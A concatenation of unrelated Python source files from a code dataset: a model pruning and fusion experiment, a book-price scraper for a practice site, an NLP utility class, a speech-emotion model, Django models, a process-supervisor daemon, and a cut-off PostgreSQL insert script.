intrafusion_test import wrapper_intra_fusion\nfrom fusion_utils_IF import MetaPruneType, PruneType\nfrom pruning_modified import prune_structured, prune_structured_intra\nfrom performance_tester import train_during_pruning, update_running_statistics\nfrom parameters import get_parameters\nfrom train import get_model\nimport torch\nfrom fusion import MSF, IntraFusion_Clustering, fusion, fusion_bn, fusion_old, fusion_sidak_multimodel, fusion_bn_alt, intrafusion_bn\nfrom sklearn.model_selection import train_test_split\nfrom torchvision.transforms import ToTensor\nfrom torch.utils.data import DataLoader\nimport torch.nn as nn\nfrom torch import optim\nfrom torch.autograd import Variable\nfrom torchvision import datasets\nimport torchvision.transforms as transforms\nfrom models import get_pretrained_models\nimport json\nimport re\n\n\ndef get_cifar_data_loader(shuffle=True):\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n train_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10(root='./data', train=True, transform=transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(32, 4),\n transforms.ToTensor(),\n normalize,\n ]), download=True),\n batch_size=128, shuffle=shuffle,\n num_workers=4, pin_memory=True)\n\n val_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10(root='./data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n normalize,\n ])),\n batch_size=128, shuffle=False,\n num_workers=4, pin_memory=True)\n \n return {\n \"train\" : train_loader,\n \"test\" : val_loader\n }\n\n\ndef evaluate_performance_simple(input_model, loaders, gpu_id, eval=True):\n '''\n Computes the accuracy of a given model (input_model) on a given dataset (loaders[\"test\"]).\n '''\n if gpu_id != -1:\n input_model = input_model.cuda(gpu_id)\n \n if eval:\n input_model.eval()\n\n accuracy_accumulated = 0\n total = 0\n with torch.no_grad():\n for images, labels in loaders['test']:\n if gpu_id != -1:\n images, labels = images.cuda(), labels.cuda()\n \n test_output = input_model(images)\n\n pred_y = torch.max(test_output, 1)[1].data.squeeze()\n accuracy = (pred_y == labels).sum().item() / float(labels.size(0))\n accuracy_accumulated += accuracy \n total += 1\n input_model.cpu()\n return accuracy_accumulated / total\n\n\ndef get_data_loader(shuffle=True):\n test_data = datasets.MNIST(\n root = 'data', \n train = False, \n transform = ToTensor()\n ) \n\n train_data = datasets.MNIST(\n root = 'data', \n train = True, \n transform = ToTensor()\n ) \n\n # 2. defining the data loader for train and test set using the downloaded MNIST data\n loaders = { \n 'test' : torch.utils.data.DataLoader(test_data, \n batch_size=100, \n shuffle=shuffle, \n num_workers=1),\n \"train\": torch.utils.data.DataLoader(train_data, \n batch_size=100, \n shuffle=shuffle, \n num_workers=1)\n }\n return loaders\n\n\ndef test(model, loaders, args):\n model.eval()\n\n accuracy_accumulated = 0\n total = 0\n with torch.no_grad():\n for images, labels in loaders['test']:\n if args.gpu_id != -1:\n images, labels = images.cuda(), labels.cuda()\n test_output,_ = model(images)\n pred_y = torch.max(test_output, 1)[1].data.squeeze()\n accuracy = (pred_y == labels).sum().item() / float(labels.size(0))\n accuracy_accumulated += accuracy \n total += 1\n return accuracy_accumulated / total\n\n\nif __name__ == '__main__':\n args = get_parameters()\n num_models = args.num_models\n dict = {}\n it = 9\n\n models = get_pretrained_models(args.model_name, \"resnet50_diff_weight_init_True_cifar10\", args.gpu_id, num_models, output_dim=10)\n\n loaders = None\n if \"vgg\" not in args.model_name and \"resnet\" not in args.model_name:\n print(\"Went in here!!!\")\n loaders = get_data_loader()\n else:\n print(\"Got cifar\")\n loaders = get_cifar_data_loader()\n\n \n \"\"\"accuracies = []\n\n result = {}\n sparsities = [0.1, 0.15, 0.2, 0.25, 0.3, 0.35, 0.4, 0.45, 0.5, 0.55, 0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9]\n result[\"prune\"] = {}\n result[\"IF\"] = {}\n prune_type = \"l1\"\n for sparsity in sparsities:\n print(\"----------\")\n t = prune_structured(net=copy.deepcopy(models[0]), loaders=None, prune_iter_epochs=0, gpu_id=args.gpu_id, example_inputs=torch.randn(1, 3, 32, 32),\n out_features=10, prune_type=prune_type, sparsity=sparsity, train_fct=None, prune_iter_steps=1)\n result[\"prune\"][sparsity] = evaluate_performance_simple(t, loaders, 0, eval=True)\n print(result[\"prune\"][sparsity])\n\n fused_model_g = wrapper_intra_fusion(model=models[0], model_name = args.model_name, resnet=False, sparsity=sparsity, prune_iter_steps=0, num_epochs=0, loaders=None, prune_type=\"l1\", meta_prune_type=MetaPruneType.IF, gpu_id=0)\n #fused_model_g = intrafusion_bn(models[0], full_model = models[0], meta_prune_type = MetaPruneType.IF, prune_type=prune_type, model_name=args.model_name, sparsity=sparsity, fusion_type=\"weight\", gpu_id = args.gpu_id, resnet = True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n result[\"IF\"][sparsity] = evaluate_performance_simple(fused_model_g, loaders, 0, eval=True)\n print(result[\"IF\"][sparsity])\n print(\"--------------\")\n with open(f\"results_datafree_resnet18_{prune_type}.json\", \"w\") as outfile:\n json.dump(result, outfile, indent=4)\n exit()\"\"\"\n\n\n for idx, ((layer0_name, fc_layer0_weight), (layer1_name, fc_layer1_weight)) in \\\n enumerate(zip(models[0].named_parameters(), models[0].named_parameters())):\n print(f\"{layer0_name} : {fc_layer0_weight.shape}\")\n\n\n fused_model_g = fusion_bn(models, model_name = args.model_name, fusion_type=\"activation\", gpu_id=-1, resnet=True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n #fused_model_g = wrapper_intra_fusion(model=models[0], model_name=args.model_name, resnet=True, sparsity=0.1, prune_iter_steps=0, num_epochs=0, loaders=loaders, prune_type=PruneType.L2, meta_prune_type=MetaPruneType.IF, gpu_id=0)\n #fused_model_g = fusion(models, gpu_id=args.gpu_id, resnet=True)\n print(evaluate_performance_simple(fused_model_g, loaders, 0, eval=True))\n exit()\n \"\"\"fused_model_g = intrafusion_bn(models[0], full_model = models[0], sparsity=0.9, fusion_type=\"weight\", gpu_id = args.gpu_id, resnet = True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n print(evaluate_performance_simple(fused_model_g, loaders, 0, eval=True))\n exit()\"\"\"\n\n\n result = {}\n\n train_epochs = 10\n sparsities = [0.9]\n total_steps = 5\n for idx, model in enumerate(models):\n result[f\"model_{idx}\"] = {}\n for sparsity in sparsities:\n print(\"****************Sparsity: \", sparsity)\n \"\"\"prune_steps = prune_structured_intra(net=copy.deepcopy(model), loaders=None, num_epochs=0, gpu_id=args.gpu_id, example_inputs=torch.randn(1, 3, 32, 32),\n out_features=10, prune_type=\"l1\", sparsity=sparsity, train_fct=None, total_steps=total_steps)\n fused_model_g = model\n for prune_step in prune_steps:\n fused_model_g = intrafusion_bn(fused_model_g, sparsity=sparsity, fusion_type=\"weight\", full_model = model, small_model=prune_step, gpu_id = args.gpu_id, resnet = True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n fused_model_g,_ = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=train_epochs, gpu_id =0, prune=False, performed_epochs=0)\"\"\"\n fused_model_g = wrapper_intra_fusion(model=model, model_name=args.model_name, resnet=False, sparsity=sparsity, prune_iter_steps=total_steps, num_epochs=train_epochs, loaders=loaders, prune_type=PruneType.L2, meta_prune_type=MetaPruneType.IF, gpu_id=0)\n accuracy_fused_g = evaluate_performance_simple(fused_model_g, loaders, 0, eval=True)\n print(\"fused: \", accuracy_fused_g)\n fused_model_g, epoch_accuracies = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=100, gpu_id =0, prune=False, performed_epochs=0)\n print(\"Final fused is: \", epoch_accuracies[-1])\n result[f\"model_{idx}\"][sparsity] = epoch_accuracies\n \n with open(\"results_intrafusion_resnet18_dataaware_prune_L2_05.json\", \"w\") as outfile:\n json.dump(result, outfile, indent=4)\n\n\n exit()\n \"\"\"sparsities = [0.5, 0.6, 0.7, 0.8]\n result = {}\n for idx, model in enumerate(models):\n result[f\"model_{idx}\"] = {}\n for sparsity in sparsities:\n fused_model_g = model\n iterations = []\n if sparsity > 0.5:\n if sparsity == 0.6:\n iterations = [0.2, 0.4]\n if sparsity == 0.7 or sparsity == 0.8:\n iterations = [0.2, 0.4, 0.6]\n for i in iterations:\n fused_model_g = intrafusion_bn(fused_model_g, sparsity=i, fusion_type=\"weight\", full_model = model, gpu_id = args.gpu_id, resnet = True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n fused_model_g, _ = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=10, gpu_id =0, prune=False, performed_epochs=0)\n\n fused_model_g = intrafusion_bn(fused_model_g, sparsity=sparsity, fusion_type=\"weight\", full_model = model, gpu_id = args.gpu_id, resnet = True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n #fused_model_g, _ = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=140, gpu_id =0, prune=False, performed_epochs=0)\n accuracy_fused_g = evaluate_performance_simple(fused_model_g, loaders, 0, eval=True)\n print('Test Accuracy of the model fused beginning gradient: %.2f' % accuracy_fused_g)\n\n #print('Test Accuracy of the model fused beginning weight: %.2f' % accuracy_fused_w)\n\n fused_model_g, epoch_accuracies = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=150-10*len(iterations), gpu_id =0, prune=False, performed_epochs=0)\n\n print('Test Accuracy of the model fused beginning gradient: %.2f' % accuracy_fused_g)\n result[f\"model_{idx}\"][str(sparsity)] = epoch_accuracies\n\n with open(\"results_intrafusion.json\", \"w\") as outfile:\n json.dump(result, outfile, indent=4)\n exit()\"\"\"\n #fused_model_w, _ = train_during_pruning(fused_model_w, loaders=loaders, num_epochs=40, gpu_id =0, prune=False, performed_epochs=0)\n fused_model_g, _ = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=40, gpu_id =0, prune=False, performed_epochs=0)\n\n #accuracy_fused_w = evaluate_performance_simple(fused_model_w, loaders, 0, eval=True)\n accuracy_fused_g = evaluate_performance_simple(fused_model_g, loaders, 0, eval=True)\n\n #print('Test Accuracy of the model fused beginning weight: %.2f' % accuracy_fused_w)\n print('Test Accuracy of the model fused beginning gradient: %.2f' % accuracy_fused_g)\n \"\"\"fused_accs = []\n for idx in range(40):\n fused_model, _ = train_during_pruning(fused_model, loaders=loaders, num_epochs=1, gpu_id =0, prune=False, performed_epochs=0)\n fused_accs.append(evaluate_performance_simple(fused_model, loaders, 0, eval=True))\n\n\n accuracy_fused = evaluate_performance_simple(fused_model, loaders, 0, eval=True)\n print('Test Accuracy of the model fused after: %.2f' % accuracy_fused)\n print(fused_accs)\"\"\"\n\n\n\n\n \n\n\n\n\n\n\n \n\n\n","repo_name":"olinmg/DL_Project_LTH_Fusing","sub_path":"fusion_pruning_experiments/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"44924297033","text":"'''\nSIMPLE WEBSCRAPPER TO SCRAPE THE PRICE OF ALL BOOKS ON SAID URL And writes them/saves to a cvs file to be viwed in a spreadsheet.\nSIMPLY CHANGE THE ELEMENTS AND VARIABLES TO REVERSE ENGINEER THIS TO WORK AS YOU SEE FIT.\n'''\nfrom flask import Flask, render_template, request, requests\nfrom bs4 import BeautifulSoup\nfrom csv import writer\n\n# Desired website:\nresponse = requests.get('http://books.toscrape.com/')\n\n# Declare Beautiful Soup Parser:\nsoup = BeautifulSoup(response.text, 'html.parser')\n\n#Declare Prices variavle:\nprices = soup.find_all(class_=\"product_price\") # find all classes with the name product_price\n\n# Save Data to CVS file:\nwith open('NameOfFile.csv', 'w') as csv_file:\n csv_writer = writer(csv_file)\n # headers = ['Title', 'Price']\n headers = [\"header1\", \"header2\"]\n csv_writer.writerow(headers)\n\n # loop through prices content and pinpick desired section/content, then save to CVS file\n for price in prices:\n myPrice = price.get_text().replace('\\n', '')[:7]\n csv_writer.writerow([myPrice]) # writes a row of each data into cvs file","repo_name":"EsC369/Python_Web_Scrapper","sub_path":"pythonWebScrapper.py","file_name":"pythonWebScrapper.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73837738923","text":"from teanaps import configure as con\n#from teanaps.nlp import NamedEntityRecognizer\n#from konlpy.tag import Kkma\nfrom kss import split_sentences\n \nimport re\nimport time\n#from pykospacing import spacing\n\nclass Processing(): \n def __init__(self):\n self.stopword_path = con.STOPWORD_PATH\n self.stopword_org_path = con.STOPWORD_ORG_PATH\n self.cnoun_path = con.CNOUN_PATH\n self.cnoun_org_path = con.CNOUN_ORG_PATH\n self.synonym_path = con.SYNONYM_PATH\n self.synonym_org_path = con.SYNONYM_ORG_PATH\n #self.kkma = Kkma()\n \n def get_synonym(self): \n synonym_list = open(con.SYNONYM_PATH, encoding=\"utf-8\").read().strip().split(\"\\n\")\n synonym_dict = {}\n for synonym in synonym_list:\n for i, word in enumerate(synonym.split(\"\\t\")):\n if i == 0:\n representative_word = word\n synonym_dict[representative_word] = synonym.split(\"\\t\")\n return synonym_dict\n \n def add_synonym(self, add_dict={}):\n synonym_dict = self.get_synonym()\n for representative_word, synonym_list in add_dict.items():\n if representative_word in synonym_dict.keys():\n for synonym in synonym_list:\n if synonym not in synonym_dict[representative_word]:\n synonym_dict[representative_word].append(synonym)\n else:\n synonym_dict[representative_word] = []\n for synonym in synonym_list:\n if synonym not in synonym_dict[representative_word]:\n synonym_dict[representative_word].append(synonym)\n f = open(self.synonym_path, \"w\", encoding=\"utf-8\")\n for representative_word, synonym_list in synonym_dict.items():\n synonym_line = \"\"\n if representative_word not in synonym_list:\n f.write(representative_word + \"\\t\")\n for synonym in synonym_list:\n synonym_line += synonym + \"\\t\"\n f.write(synonym_line.strip() + \"\\n\")\n f.close()\n \n def remove_synonym(self, remove_list=[]):\n if type(remove_list) == type(\"\"):\n remove_list = [remove_list]\n synonym_dict = self.get_synonym()\n for synonym in remove_list:\n if synonym in synonym_dict.keys():\n del synonym_dict[synonym]\n else:\n for representative_word, synonym_list in synonym_dict.items():\n if synonym in synonym_list:\n synonym_list.remove(synonym)\n f = open(self.synonym_path, \"w\", encoding=\"utf-8\")\n for representative_word, synonym_list in synonym_dict.items():\n synonym_line = \"\"\n if representative_word not in synonym_list:\n f.write(representative_word + \"\\t\")\n for synonym in synonym_list:\n synonym_line += synonym + \"\\t\"\n f.write(synonym_line.strip() + \"\\n\")\n f.close()\n \n def clear_synonym(self):\n f = open(self.synonym_path, \"w\", encoding=\"utf-8\")\n f.close()\n \n def set_org_synonym(self):\n f = open(self.synonym_path, \"w\", encoding=\"utf-8\")\n f_org = open(self.synonym_org_path, encoding=\"utf-8\")\n for line in f_org:\n f.write(line)\n f_org.close()\n f.close()\n \n def is_synonym(self, synonym):\n synonym_dict = self.get_synonym()\n if synonym in synonym_dict.keys():\n return True\n for representative_word, synonym_list in synonym_dict.items():\n if representative_word == synonym or synonym in synonym_list:\n return True\n return False\n \n def get_cnoun(self):\n cnoun_list = []\n f = open(self.cnoun_path, encoding=\"utf-8\")\n for line in f:\n cnoun_list.append(line.strip())\n f.close()\n return cnoun_list\n \n def add_cnoun(self, add_list=[]):\n cnoun_list = self.get_cnoun()\n f = open(self.cnoun_path, \"a\", encoding=\"utf-8\")\n if type(add_list) == type(\"\"):\n add_list = [add_list]\n for cnoun in add_list:\n if cnoun not in cnoun_list:\n f.write(cnoun + \"\\n\")\n f.close()\n \n def remove_cnoun(self, remove_list=[]):\n cnoun_list = self.get_cnoun()\n f = open(self.cnoun_path, \"w\", encoding=\"utf-8\")\n if type(remove_list) == type(\"\"):\n remove_list = [remove_list]\n for cnoun in cnoun_list:\n if cnoun not in remove_list:\n f.write(cnoun + \"\\n\")\n f.close()\n \n def clear_cnoun(self):\n f = open(self.cnoun_path, \"w\", encoding=\"utf-8\")\n f.close()\n \n def set_org_cnoun(self):\n f = open(self.cnoun_path, \"w\", encoding=\"utf-8\")\n f_org = open(self.cnoun_org_path, encoding=\"utf-8\")\n for line in f_org:\n f.write(line)\n f_org.close()\n f.close()\n \n def is_cnoun(self, cnoun):\n cnoun_list = self.get_cnoun()\n if cnoun in cnoun_list:\n return True\n else:\n return False\n \n def get_stopword(self):\n stopword_list = []\n f = open(self.stopword_path, encoding=\"utf-8\")\n for line in f:\n stopword_list.append(line.strip())\n f.close()\n return stopword_list\n \n def add_stopword(self, add_list=[]):\n stopword_list = self.get_stopword()\n f = open(self.stopword_path, \"a\", encoding=\"utf-8\")\n if type(add_list) == type(\"\"):\n add_list = [add_list]\n for stopword in add_list:\n if stopword not in stopword_list:\n f.write(stopword + \"\\n\")\n f.close()\n \n def remove_stopword(self, remove_list=[]):\n stopword_list = self.get_stopword()\n f = open(self.stopword_path, \"w\", encoding=\"utf-8\")\n if type(remove_list) == type(\"\"):\n remove_list = [remove_list]\n for stopword in stopword_list:\n if stopword not in remove_list:\n f.write(stopword + \"\\n\")\n f.close()\n \n def clear_stopword(self):\n f = open(self.stopword_path, \"w\", encoding=\"utf-8\")\n f.close()\n \n def set_org_stopword(self):\n f = open(self.stopword_path, \"w\", encoding=\"utf-8\")\n f_org = open(self.stopword_org_path, encoding=\"utf-8\")\n for line in f_org:\n f.write(line)\n f_org.close()\n f.close()\n \n def is_stopword(self, stopword):\n stopword_list = self.get_stopword()\n if stopword in stopword_list:\n return True\n else:\n return False\n \n def start_timer(self):\n self.start = time.time()\n self.lab = []\n \n def lab_timer(self):\n self.lab.append((len(self.lab)+1, round(time.time() - self.start, 4)))\n return self.lab\n \n '''\n def get_spacing(self, sentence):\n if len(sentence) < 195:\n sentence = spacing(sentence)\n return sentence\n '''\n \n def get_token_position(self, sentence_org, tag_list):\n content_ = sentence_org\n position = 0\n loc_list = []\n for word, pos in tag_list:\n loc = content_.find(word)\n if loc != -1:\n position += loc\n content_ = content_[loc:]\n start = position\n end = position + len(word)\n org_word = sentence_org[start:end]\n else:\n start = 0\n end = 0\n org_word = word\n loc_list.append((org_word, pos, (start, end)))\n return loc_list\n \n def language_detector(self, sentence):\n len_ko = len(re.sub(\"[^가-힇]\", \"\", sentence))\n len_en = len(re.sub(\"[^a-zA-Z]\", \"\", sentence))\n return \"ko\" if len_ko >= len_en else \"en\"\n\n def iteration_remover(self, sentence, replace_char=\".\"):\n pattern_list = [r'(.)\\1{5,}', r'(..)\\1{5,}', r'(...)\\1{5,}']\n for pattern in pattern_list:\n matcher= re.compile(pattern)\n iteration_term_list = [match.group() for match in matcher.finditer(sentence)]\n for iteration_term in iteration_term_list:\n sentence = sentence.replace(iteration_term, \n iteration_term[:pattern.count(\".\")] + replace_char*(len(iteration_term)-pattern.count(\".\")))\n return sentence\n \n def get_plain_text(self, sentence, pos_list=[], word_index=0, pos_index=1, tag_index=1, tag=True):\n plain_text_sentence = \"\"\n for token in sentence:\n if len(pos_list) > 0:\n if token[pos_index] in pos_list:\n plain_text_sentence += token[word_index].replace(\" \", \"\")\n if tag:\n plain_text_sentence += \"/\" + token[tag_index] + \" \"\n else:\n plain_text_sentence += \" \"\n else:\n plain_text_sentence += token[word_index].replace(\" \", \"\")\n if tag:\n plain_text_sentence += \"/\" + token[tag_index] + \" \"\n else:\n plain_text_sentence += \" \"\n return plain_text_sentence.strip()\n \n def replacer(self, sentence):\n patterns = [\n (r'won\\'t', 'will not'),\n (r'can\\'t', 'cannot'),\n (r'i\\'m', 'i am'),\n (r'ain\\'t', 'is not'),\n (r'(\\w+)\\'ll', '\\g<1> will'),\n (r'(\\w+)n\\'t', '\\g<1> not'),\n (r'(\\w+)\\'ve', '\\g<1> have'),\n (r'(\\w+)\\'s', '\\g<1> is'),\n (r'(\\w+)\\'re', '\\g<1> are'),\n (r'(\\w+)\\'d', '\\g<1> would'),\n ]\n self.patterns = [(re.compile(regex), repl) for (regex, repl) in patterns]\n for (pattern, repl) in self.patterns:\n sentence = re.sub(pattern, repl, sentence)\n return sentence\n \n '''\n def masking(self, sentence, replace_char=\"*\", replace_char_pattern = \"\", ner_tag_list=[], model_path=\"\"):\n if model_path == \"\":\n ner = NamedEntityRecognizer()\n else:\n ner = NamedEntityRecognizer(model_path=model_path)\n ner_result = ner.parse(sentence)\n for word, ner_tag, loc in ner_result:\n if len(ner_tag_list) == 0 or ner_tag in ner_tag_list:\n if replace_char_pattern != \"\":\n masked_word = \"\"\n for w, r in zip(word, replace_char_pattern):\n if w == r or r == \"_\":\n masked_word += w\n elif r == replace_char:\n masked_word += r\n else:\n masked_word += w\n if len(word) > len(replace_char_pattern):\n masked_word += replace_char*len(word[len(replace_char_pattern):])\n sentence = sentence[:loc[0]] + masked_word + sentence[loc[1]:]\n else:\n sentence = sentence[:loc[0]] + replace_char*len(word) + sentence[loc[1]:]\n \n return sentence\n '''\n\n def sentence_splitter(self, paragraph):\n #sentence_list = self.kkma.sentences(paragraph)\n sentence_list = split_sentences(paragraph)\n return sentence_list\n \n","repo_name":"fingeredman/teanaps","sub_path":"nlp/Processing.py","file_name":"Processing.py","file_ext":"py","file_size_in_byte":11413,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"19"} +{"seq_id":"33192152382","text":"class Point:\n\t'Represents a point in two-dimensional geometric coordinates'\n\tdef __init__(self, x=1, y=3):\n\t\t'''Initilies the position of...'''\n\t\tself.move(x, y)\n\tdef move(self, x, y):\n\t\t\"Move the point to a new location in 2D space.\"\n\t\tself.x = x\n\t\tself.y = y\n\tdef reset(self):\n\t\t\"\"\"Resets the points to 0,0\"\"\"\n\t\tself.move(0, 0)\np = Point(3,1)\nagain = True\nwhile(again):\n\tprint(p.x, p.y)\n\tp.move(p.x+1, p.y-3)\n\tif p.x > 100:\n\t\tagain = False\na = raw_input(\"Press Return Key To Exit...\")\n","repo_name":"brandann/GarbageCode","sub_path":"PYTHON/Examples/first_class.py","file_name":"first_class.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43146580849","text":"from transformers.models.wav2vec2.modeling_wav2vec2 import Wav2Vec2PreTrainedModel, Wav2Vec2Model\nimport torch\nimport torch.nn as nn\n\n# Wav2vec model skeleton\nclass Wav2vec2SER(Wav2Vec2PreTrainedModel):\n def __init__(self, config):\n super().__init__(config)\n self.config = config\n self.feat_extractor = Wav2Vec2Model(config)\n \n self.cls_layer = nn.Sequential(*[\n nn.Dropout(config.final_dropout),\n nn.Linear(config.hidden_size, config.hidden_size),\n nn.Tanh(),\n nn.Dropout(config.final_dropout),\n nn.Linear(config.hidden_size, config.num_labels)\n ]) \n self.init_weights()\n\n def forward(self, x):\n backbone_out = self.feat_extractor(x)\n logits = self.cls_layer(torch.mean(backbone_out[0], dim=1))\n return logits","repo_name":"adithya-tp/Low-Resource-SER-Experiments","sub_path":"models/wav2vec2.py","file_name":"wav2vec2.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14430074886","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n# veri kumesini oku\nverikumesi = pd.read_csv(\"ds1.txt\",delimiter=\"\\t\")\n\nX = verikumesi.iloc[:,:-1].values\ny = verikumesi.iloc[:,1].values\n\n# veri kumesini egitim ve test olarak parcala\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\n\n# dogrusal regresyon modeli\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\n\n# tahmin\ny_pred = regressor.predict(X_test)\n\n# veri gorsellestirme\nplt.scatter(X_train, y_train, color='red')\nplt.plot(X_test, y_pred, color='blue')\nplt.show()","repo_name":"ocatak-zz/ocatak.github.io","sub_path":"SIB552/01/src/linear_reg.py","file_name":"linear_reg.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"70392388524","text":"from django.db import models\nfrom django.contrib.auth import get_user_model\n\n\nUser = get_user_model()\nTEXT_LIMIT = 15 # Ограничение количтсве символов\n\n\nclass Group(models.Model):\n title = models.CharField('Имя группы', max_length=200)\n slug = models.SlugField(unique=True)\n description = models.TextField('Описание')\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = 'Группа'\n verbose_name_plural = 'Группы'\n\n\nclass Post(models.Model):\n text = models.TextField(\n 'Текст поста',\n help_text='Введите текст поста',\n )\n pub_date = models.DateTimeField(\n 'Дата публикации',\n auto_now_add=True,\n db_index=True,\n )\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='posts',\n verbose_name='Автор',\n )\n group = models.ForeignKey(\n Group,\n on_delete=models.SET_NULL,\n related_name='posts',\n blank=True,\n null=True,\n verbose_name='Группа',\n help_text='Группа, к которой будет относиться пост',\n )\n image = models.ImageField(\n 'Картинка',\n upload_to='posts/',\n blank=True,\n help_text='Загрузите картинку',\n )\n\n def __str__(self):\n return self.text[:TEXT_LIMIT]\n\n class Meta:\n ordering = ['-pub_date']\n verbose_name = 'Сообщение'\n verbose_name_plural = 'Сообщения'\n\n\nclass Comment(models.Model):\n post = models.ForeignKey(\n Post,\n on_delete=models.CASCADE,\n related_name='comments',\n verbose_name='Пост',\n help_text='Пост к которому оставлен комментарий',\n )\n author = models.ForeignKey(\n User,\n related_name='comments',\n verbose_name='Автор комментария',\n on_delete=models.CASCADE,\n )\n text = models.TextField(\n 'Комментарий',\n help_text='Напишите комментарий',\n )\n created = models.DateTimeField(\n 'Дата публикации',\n auto_now_add=True,\n db_index=True,\n )\n\n def __str__(self):\n return self.text[:TEXT_LIMIT]\n\n class Meta:\n ordering = ['-created']\n verbose_name = 'Комментарий'\n verbose_name_plural = 'Комментарии'\n\n\nclass Follow(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='follower',\n verbose_name='Подписчик',\n )\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n verbose_name='Автор',\n related_name='following',\n )\n\n def __str__(self):\n return f'{self.user} подписался на {self.author}'\n\n class Meta:\n verbose_name = 'Подписка'\n verbose_name_plural = 'Подписки'\n constraints = [\n models.UniqueConstraint(\n fields=['user', 'author'],\n name='unique_follow',\n ),\n ]\n","repo_name":"iliya12321/Yatube","sub_path":"yatube/posts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"14713296983","text":"import os\nimport time\nimport signal\nimport psutil\nfrom logger import Logger\nfrom process.process import Process\n\n\nclass Master:\n\n def __init__(self, child_process):\n self.__stop = False\n self.process = []\n self.logger = Logger(Master.__name__, 'musicdaemon')\n\n self.child_process = child_process\n self.num_process = len(self.child_process)\n\n def main(self):\n master_pid = os.getpid()\n self.logger.log(\"start\", \"Start Master, PID {0}\".format(master_pid))\n\n signal.signal(signal.SIGINT, self.stop)\n signal.signal(signal.SIGTERM, self.stop)\n\n process_class_index = 0\n for child_process_id in range(self.num_process):\n pid = os.fork()\n child_process = self.child_process[process_class_index]\n process_name = child_process.name\n process_class = child_process.process_class\n\n if pid == 0:\n process = Process(child_process.name)\n exit_code = process.main(process_class)\n exit(exit_code)\n else:\n self.logger.log(\"start\",\n \"Start {0} Process {1} Process-{2} PID {3}\".format(\n process_class.__name__, process_name, child_process_id, pid\n ))\n self.process.append({\"id\": child_process_id, \"pid\": pid, \"name\": process_name})\n\n process_class_index += 1\n\n while not self.__stop:\n # os.system(\"ps aux | awk '{ print $8 \" \" $2 }' | grep -w Z\")\n for proc in psutil.process_iter():\n try:\n pinfo = proc.as_dict(attrs=['pid'])\n for p in self.process:\n if pinfo['pid'] == p['pid']:\n # print(p['name'], proc.status())\n if proc.status() == \"zombie\":\n proc.kill()\n self.process.pop(self.process.index(p))\n # else:\n # print(p['name'], proc.status())\n except psutil.NoSuchProcess:\n pass\n if len(self.process) == 1 and self.process[0]['name'] == 'server':\n self.stop(signal.SIGINT, 0)\n time.sleep(1)\n\n self.logger.log(\"stop\", \"Stop Master, PID {0}\".format(os.getpid()))\n\n def stop(self, signum, frame):\n self.__stop = True\n self.logger.log(\"stop\", \"Receive Signal {0}\".format(signum))\n\n for process in self.process:\n self.logger.log(\"stop\",\n \"Send Signal {0} to {1} Process-{2} PID {3}\".format(\n signal.SIGTERM, process['name'], process['id'], process['pid']\n ))\n os.kill(process['pid'], signal.SIGTERM)\n os.kill(process['pid'], signal.SIGKILL)\n","repo_name":"whiteblue3/apoweroftrance-radio-system","sub_path":"musicdaemon/process/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2703321160","text":"import psycopg2\n\n\ndef bullk_insert_img_file(records):\n try:\n connection = psycopg2.connect(user = \"postgres\",\n password = \"Yash@171\",\n host = \"localhost\",\n port = \"5432\",\n database = \"File Handling\")\n\n cursor = connection.cursor()\n cursor.execute(\"DROP TABLE IF EXISTS metadata_of_image_file\")\n cursor.execute(\"\"\"CREATE TABLE metadata_of_image_file(id SERIAL PRIMARY KEY,\n image_name VARCHAR(255),\n hash_value VARCHAR(255),\n model VARCHAR(255), \n date_time VARCHAR(255), \n image_size VARCHAR(255))\"\"\")\n # cursor.execute(create_table_query)\n connection.commit()\n print(\"Table created successfully in PostgreSQL \")\n\n sql_insert_query =\"\"\"INSERT INTO metadata_of_image_file (image_name,hash_value, model, date_time, image_size) \n VALUES(%s, %s, %s, %s, %s)\"\"\"\n # executemany() to insert multiple rows\n result = cursor.executemany(sql_insert_query, records)\n 